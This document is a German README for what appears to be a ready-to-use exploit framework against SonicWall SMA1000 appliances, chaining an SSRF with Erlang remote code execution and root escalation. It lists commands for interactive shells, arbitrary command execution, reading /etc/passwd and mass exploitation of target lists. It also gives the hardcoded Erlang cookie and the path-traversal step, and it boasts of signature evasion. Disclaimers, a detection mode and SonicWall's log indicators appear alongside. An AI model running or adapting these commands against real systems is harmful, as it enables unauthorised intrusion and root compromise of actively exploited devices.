
Multi-Exploit-Framework für SonicWall SMA1000, das SSRF (CVE-2026-15409) mit Erlang RCE und Root-Privilegieneskalation (CVE-2026-15410) verknüpft. Bietet interaktive Shell, Batch-Scanning, Dateioperationen und einen sicheren Erkennungsmodus für autorisierte Penetrationstests.

Exploit-Framework & sicheres Erkennungstool
Nur für autorisierte Sicherheitstests.
Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Penetrationstests bereitgestellt.
Die Autoren und Mitwirkenden übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch diese Software verursacht werden. Die Nutzer sind allein dafür verantwortlich, dass sie vor dem Testen die ausdrückliche schriftliche Erlaubnis des Eigentümers des Ziels eingeholt haben. Unbefugter Zugriff auf Computersysteme ist nach dem Computer Fraud and Abuse Act (CFAA) und ähnlichen Gesetzen weltweit illegal.
Durch die Nutzung dieser Software stimmst du Folgendem zu:
⚠️ WARNUNG: Diese Schwachstelle wird derzeit aktiv ausgenutzt. Unbefugte Nutzung kann schwerwiegende rechtliche Konsequenzen haben.
CVE-2026-15409 ist eine kritische nicht authentifizierte Server-Side Request Forgery (SSRF)-Schwachstelle, die in der SonicWall SMA1000 Appliance Work Place-Schnittstelle entdeckt wurde.
So funktioniert es:
wsproxy-Endpunkt zu tunneln.os:cmd/1-Aufrufe erreicht.Wichtige Fakten:
exploit.py)Der vollständig einsatzbereite Exploit verkettet CVE-2026-15409 und CVE-2026-15410, um eine Kompromittierung auf Root-Ebene zu erreichen.
pip (für requests-Bibliothek)pip install -r requirements.txt
# Interaktive Shell auf dem Ziel
python exploit.py -u 192.168.1.100
# Einzelnen Befehl ausführen
python exploit.py -u 192.168.1.100 --exec "id && whoami"
# Datei lesen
python exploit.py -u 192.168.1.100 --read-file /etc/passwd
# SSRF-Erkennung vor dem Exploit aktivieren
python exploit.py -u 192.168.1.100 --detect
# Root-Privilegienerweiterung versuchen
python exploit.py -u 192.168.1.100 --privesc
# Massenexploit aus Datei (50 Threads)
python exploit.py -l targets.txt -m 50 --exec "uname -a"
# Benutzerdefinierter Port und Pfad
python exploit.py -u 10.0.0.5 -p 8443 --path /workplace
# Pipe-Modus (Befehl von stdin lesen)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100
# Einzelziel-Scan
python checker.py https://192.168.1.100
# Benutzerdefinierter Port und Pfad
python checker.py 192.168.1.100 --port 8443 --path /workplace
# Massen-Scan aus Datei
python checker.py --list targets.txt
⚠️ Wichtig: Diese Schwachstellen betreffen keine SonicWall-Firewalls (SSL-VPN) oder SMA 100 Serie.
Der wsproxy-Endpunkt auf Port 443 akzeptiert einen bmID-Parameter, der mit -3389 beginnt, und eine host:port-Spezifikation. Indem Angreifer host=127.0.0.1 und port=1050 angeben, können sie zum internen Erlang-Verteilungsdienst tunneln.
Der Erlang-Knoten verwendet ein fest codiertes Standard-Cookie: 10ecad5b446e86864832904cd439b6b70262. Dies ermöglicht die entfernte Authentifizierung und Ausführung beliebiger os:cmd/1-Aufrufe.
Nach der Authentifizierung schreibt der Exploit ein Shell-Skript nach /var/tmp/ und löst den AMC remove_hotfix XML-RPC-Endpunkt mit einem Path Traversal (../../../../var/tmp/script.sh) aus, wodurch das Skript als root ausgeführt wird.
SonicWall empfiehlt, Folgendes zu überprüfen:
extraweb_access.log nach /__api__/login oder /__api__/logout (Status 200)extraweb_access.log nach /wsproxy mit verdächtigen Host-Parametern (Status 101)ctrl-service.log nach Hotfix-Rollbacks mit Path Traversal/var/lib/unit/conf.json mit Routen für /__api__/login oder /__api__/logout| Funktion | Beschreibung |
|---|
| 🚀 SSRF → Erlang RPC | Automatisch durch wsproxy tunneln, um interne Erlang-Knoten zu erreichen. |
| 💻 Remote Code Execution | Beliebige Betriebssystembefehle über os:cmd/1 ausführen. |
| 🔐 Interaktive Shell | Eine Live-Shell mit Unterstützung für privesc- und download-Befehle starten. |
| 👑 Root Privesc | CVE-2026-15410 ausnutzen, um über AMC Path Traversal auf root zu eskalieren. |
| 📁 Dateioperationen | Dateien auf dem Zielsystem lesen und schreiben. |
| 🌐 Batch-Scanning | Mehrere Ziele mit Threading massenhaft ausnutzen (-l-Flag). |
| 🎯 SSRF-Erkennung | Optionales --detect-Flag für sichere Schwachstellenüberprüfung. |
| ⚙️ Anpassbar | WebSocket-URL, Origin, User-Agent, Cookie und mehr überschreiben. |
| 🧩 Keine zusätzlichen Abhängigkeiten | Verwendet nur die Python-Standardbibliothek (außer optional requests für die Erkennung). |
| 🔌 Eigene WebSocket-Implementierung | Keine externen WebSocket-Bibliotheken — benutzerdefinierter Socket-Level-Handshake vermeidet bibliotheksspezifische Signatur-Fingerabdrücke für bessere OPSEC. |
| Produkt | Verwundbare Versionen | Behobene Versionen |
|---|
| SMA 6210 | 12.4.3-03245, 12.4.3-03387, 12.4.3-03434 12.5.0-02283, 12.5.0-02624, 12.5.0-02800 | 12.4.3-03453+ 12.5.0-02835+ |
| SMA 7210 | Wie oben | Wie oben |
| SMA 8200v | Wie oben | Wie oben |